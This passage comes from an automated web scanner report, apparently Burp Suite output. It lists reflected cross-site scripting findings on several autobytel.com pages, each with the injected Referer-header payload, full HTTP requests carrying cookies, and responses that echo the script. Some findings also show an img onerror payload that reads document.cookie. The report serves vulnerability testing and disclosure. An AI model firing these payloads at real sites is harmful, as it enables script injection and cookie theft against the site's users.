<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~4487a";alert(1)//fd21207da5d";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "4875259E-03DC-8F03-1FD18285
...[SNIP]...

4.1905. http://www.autobytel.com/car-incentives.htm [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/car-incentives.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1358d"%3balert(1)//337f917d70d was submitted in the Referer HTTP header. This input was echoed as 1358d";alert(1)//337f917d70d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /car-incentives.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=1358d"%3balert(1)//337f917d70d

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 33998
Expires: Mon, 24 Jan 2011 23:51:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:51:01 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:51:01 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:51:01 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E1358d%22%3Balert%281%29%2F%2F337f917d70d;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~1358d";alert(1)//337f917d70d";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "485EB0AB-A383-4E80-12077B3C
...[SNIP]...

4.1906. http://www.autobytel.com/car-incentives.htm [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/car-incentives.htm

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload b7de5--><img%20src%3da%20onerror%3dalert(1)>3a1ce75c479 was submitted in the Referer HTTP header. This input was echoed as b7de5--><img src=a onerror=alert(1)>3a1ce75c479 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 34036
Expires: Mon, 24 Jan 2011 23:51:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:51:10 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:51:10 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:51:10 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7Eb7de5%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3E3a1ce75c479;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(1)>3a1ce75c479 -->
...[SNIP]...

4.1907. http://www.autobytel.com/car-news.htm [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/car-news.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f67d4"%3balert(1)//076a85faa1d was submitted in the Referer HTTP header. This input was echoed as f67d4";alert(1)//076a85faa1d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /car-news.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=f67d4"%3balert(1)//076a85faa1d

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Tue, 25 Jan 2011 00:00:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:00:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Thu, 17-Jan-2041 00:00:26 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Thu, 17-Jan-2041 00:00:26 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7Ef67d4%22%3Balert%281%29%2F%2F076a85faa1d;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 40956

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~f67d4";alert(1)//076a85faa1d";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "48B4DD26-BE7A-9BB2-795600D8
...[SNIP]...

4.1908. http://www.autobytel.com/car-news.htm [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/car-news.htm

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 934eb--><img%20src%3da%20onerror%3dalert(1)>6182ba0f111 was submitted in the Referer HTTP header. This input was echoed as 934eb--><img src=a onerror=alert(1)>6182ba0f111 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Tue, 25 Jan 2011 00:02:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:02:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Thu, 17-Jan-2041 00:02:40 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Thu, 17-Jan-2041 00:02:40 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E934eb%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3E6182ba0f111;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 40994

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(1)>6182ba0f111 -->
...[SNIP]...

4.1909. http://www.autobytel.com/car-pictures.htm [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/car-pictures.htm

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload f15c5--><img%20src%3da%20onerror%3dalert(1)>8d4686ca011 was submitted in the Referer HTTP header. This input was echoed as f15c5--><img src=a onerror=alert(1)>8d4686ca011 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /car-pictures.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=f15c5--><img%20src%3da%20onerror%3dalert(1)>8d4686ca011

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 43671
Expires: Mon, 24 Jan 2011 23:58:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:58:06 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:58:05 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:58:05 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7Ef15c5%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3E8d4686ca011;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(1)>8d4686ca011 -->
...[SNIP]...

4.1910. http://www.autobytel.com/car-pictures.htm [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/car-pictures.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1156f"%3balert(1)//1427023b7d4 was submitted in the Referer HTTP header. This input was echoed as 1156f";alert(1)//1427023b7d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:57:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:57:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:57:48 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:57:48 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E1156f%22%3Balert%281%29%2F%2F1427023b7d4;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 43633

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~1156f";alert(1)//1427023b7d4";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "489CBD33-C5FD-A9E1-3B3E20BC
...[SNIP]...

4.1911. http://www.autobytel.com/car-reviews.htm [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/car-reviews.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42332"%3balert(1)//ab1593c27bb was submitted in the Referer HTTP header. This input was echoed as 42332";alert(1)//ab1593c27bb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /car-reviews.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=42332"%3balert(1)//ab1593c27bb

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:58:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:58:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:58:31 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:58:31 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E42332%22%3Balert%281%29%2F%2Fab1593c27bb;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 49297

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~42332";alert(1)//ab1593c27bb";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "48A35AD4-BDD2-4B2E-EF829E03
...[SNIP]...

4.1912. http://www.autobytel.com/car-reviews.htm [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/car-reviews.htm

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload dd5d7--><img%20src%3da%20onerror%3dalert(1)>4bc6a57004c was submitted in the Referer HTTP header. This input was echoed as dd5d7--><img src=a onerror=alert(1)>4bc6a57004c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:58:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:58:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:58:48 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:58:48 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7Edd5d7%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3E4bc6a57004c;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 49335

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(1)>4bc6a57004c -->
...[SNIP]...

4.1913. http://www.autobytel.com/content/buy/finance/index.cfm/action/Calculator [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/buy/finance/index.cfm/action/Calculator

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa9c0"%3balert(1)//ee9bfa581b9 was submitted in the Referer HTTP header. This input was echoed as fa9c0";alert(1)//ee9bfa581b9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /content/buy/finance/index.cfm/action/Calculator HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=fa9c0"%3balert(1)//ee9bfa581b9

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:37:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:37:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:37:27 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:37:27 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7Efa9c0%22%3Balert%281%29%2F%2Fee9bfa581b9;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 35892



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengr
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~fa9c0";alert(1)//ee9bfa581b9";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "47E25BF7-C108-F67E-663CB354
...[SNIP]...

4.1914. http://www.autobytel.com/content/buy/finance/index.cfm/action/Calculator [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/buy/finance/index.cfm/action/Calculator

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 4a9c0--><img%20src%3da%20onerror%3dalert(1)>128513abd15 was submitted in the Referer HTTP header. This input was echoed as 4a9c0--><img src=a onerror=alert(1)>128513abd15 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:37:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:37:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:37:34 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:37:34 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E4a9c0%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3E128513abd15;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 35930



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengr
...[SNIP]...
<img src=a onerror=alert(1)>128513abd15 -->
...[SNIP]...

4.1915. http://www.autobytel.com/content/buy/index.cfm [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/buy/index.cfm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a138"%3balert(1)//294e4adfe8b was submitted in the Referer HTTP header. This input was echoed as 1a138";alert(1)//294e4adfe8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /content/buy/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
